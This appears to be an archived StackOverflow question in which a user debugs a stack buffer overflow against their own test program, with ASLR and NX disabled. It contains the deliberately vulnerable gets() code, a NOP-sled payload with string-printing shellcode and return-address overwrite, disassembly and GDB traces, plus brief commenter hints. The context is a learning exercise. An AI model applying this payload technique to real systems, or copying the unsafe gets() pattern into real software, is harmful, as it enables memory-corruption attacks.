Databases
StackOverflow2013
Postsdbo
POProblems exploiting a buffer overflow
 

Note that there are some explanatory texts on larger screens.

plurals
  1. POProblems exploiting a buffer overflow
    primarykey
    data
    text
    <p>Some days ago I coded a simple code to test a buffer overflow exploitation on x86 system. In order to keep it simple I disabled ASLR and NX so there are no protection that could cause weird behaviours.</p> <p>This is my C code to exploit:</p> <pre><code>#include &lt;stdio.h&gt; void read_txt(){ char txt[64]; printf("Write something:"); gets(txt); } int main(){ read_txt(); return 0; } </code></pre> <p>I also wrote my own shellcode that just prints a string. As far as I know the payload should be something like this, fill the buffer with NOP instructions + shellcode, add 0x41414141 (AAAA) to overwrite EBP register and finally I override the return address with an address pointing to the middle of the NOPs.</p> <p>Actually it does not work in that way and my payload is as follows:</p> <pre><code>[1-\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x68\x20\x3b\x29\x20\x68\x68\x73\x65\x63\x68\x20\x48\x69\x67\x68\x48\x6f\x6c\x61\x89\xe1\xb2\x0f\xcd\x80\xb0\x01\x31\xdb][2-\x41\x41\x41\x41][3-\x89\xf4\xff\xbf][4-\x89\xf4\xff\xbf] 1- NOPs + Shellcode = 60bytes 2- AAAA =4 bytes (Padding to fill the buffer, if NOP+Shellcode fills 64bytes it does not work) 3- Address to override EBP (In the middle of NOPs) 4- Overrides Return Address </code></pre> <p>This exploit works on gdb but fails if I pass the payload directly to the program, and I think that the problem is that just before the program executes gets() function the disasembler shows the <strong>leave</strong> instruction which points esp to ebp and causes an error.</p> <p>This is the disassembly of read_txt() function:</p> <pre><code>0x0804844c &lt;+0&gt;: push %ebp 0x0804844d &lt;+1&gt;: mov %esp,%ebp 0x0804844f &lt;+3&gt;: sub $0x44,%esp 0x08048452 &lt;+6&gt;: movl $0x8048510,(%esp) 0x08048459 &lt;+13&gt;: call 0x8048320 &lt;printf@plt&gt; 0x0804845e &lt;+18&gt;: lea -0x40(%ebp),%eax 0x08048461 &lt;+21&gt;: mov %eax,(%esp) 0x08048464 &lt;+24&gt;: call 0x8048330 &lt;gets@plt&gt; 0x08048469 &lt;+29&gt;: leave 0x0804846a &lt;+30&gt;: ret </code></pre> <p>And this is the execution of the exploit on GDB:</p> <pre><code>(gdb) x/20x $esp 0xbffff47c: 0xbffff480 0x90909090 0x90909090 0x90909090 0xbffff48c: 0x90909090 0xc0319090 0xc931db31 0x04b0d231 0xbffff49c: 0x206801b3 0x6820293b 0x63657368 0x69482068 0xbffff4ac: 0x6f486867 0xe189616c 0x80cd0fb2 0xdb3101b0 0xbffff4bc: 0x41414141 0xbffff489 0xbffff489 0xbffff500 (gdb) s Warning: Cannot insert breakpoint 0. Error accessing memory address 0x90909090: I/O Error. 0xbffff489 in ?? () (gdb) c Continuing. Shellcode Executed Program received signal SIGSEGV, Segmentation fault. 0xbffff4b9 in ?? () (gdb) </code></pre> <p>Notice that EBP points to 0x90909090 because it has the same address that overrides the return address, and also notice the string <strong>Shellcode Executed</strong> that is the shellcode included in the payload.</p> <p>My question is, where could I point EBP to avoid this problem before pointing the return address to the NOP slide? Also as secondary question why I can't fill the 64bytes buffer with NOPs+Shellcode?</p> <p>Regards.</p>
    singulars
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. PTQuestion
    1. USNucklear
    1. USNucklear
    plurals
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. COWhy would you add AAAA? You need a valid return address you derive somehow. To do that, check the old smashing the stack for fun and profit again: or, as you appear to have read the art of exploitation, the relevant section.
      singulars
      1. POProblems exploiting a buffer overflow
      1. USgnometorule
    2. COMy buffer should be 64bytes but it actually has 60bytes so that 4 A's are padding I added to reach ebp.
      singulars
      1. POProblems exploiting a buffer overflow
      1. USNucklear
 

Querying!

 
Guidance
A row detail

Detail views are divided into sections. All the information in the data section comes from columns in the selected row. The other sections display data from other, related rows.

Related data can be related in a to-one or a to-many fashion. Captions of data related in a to-many fashion link to a list view showing a filtered view of the table.

Try moving around until you find a non-empty to-many entry and click on the label to get to one. You can move back to the root by clicking on the database name in the header.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload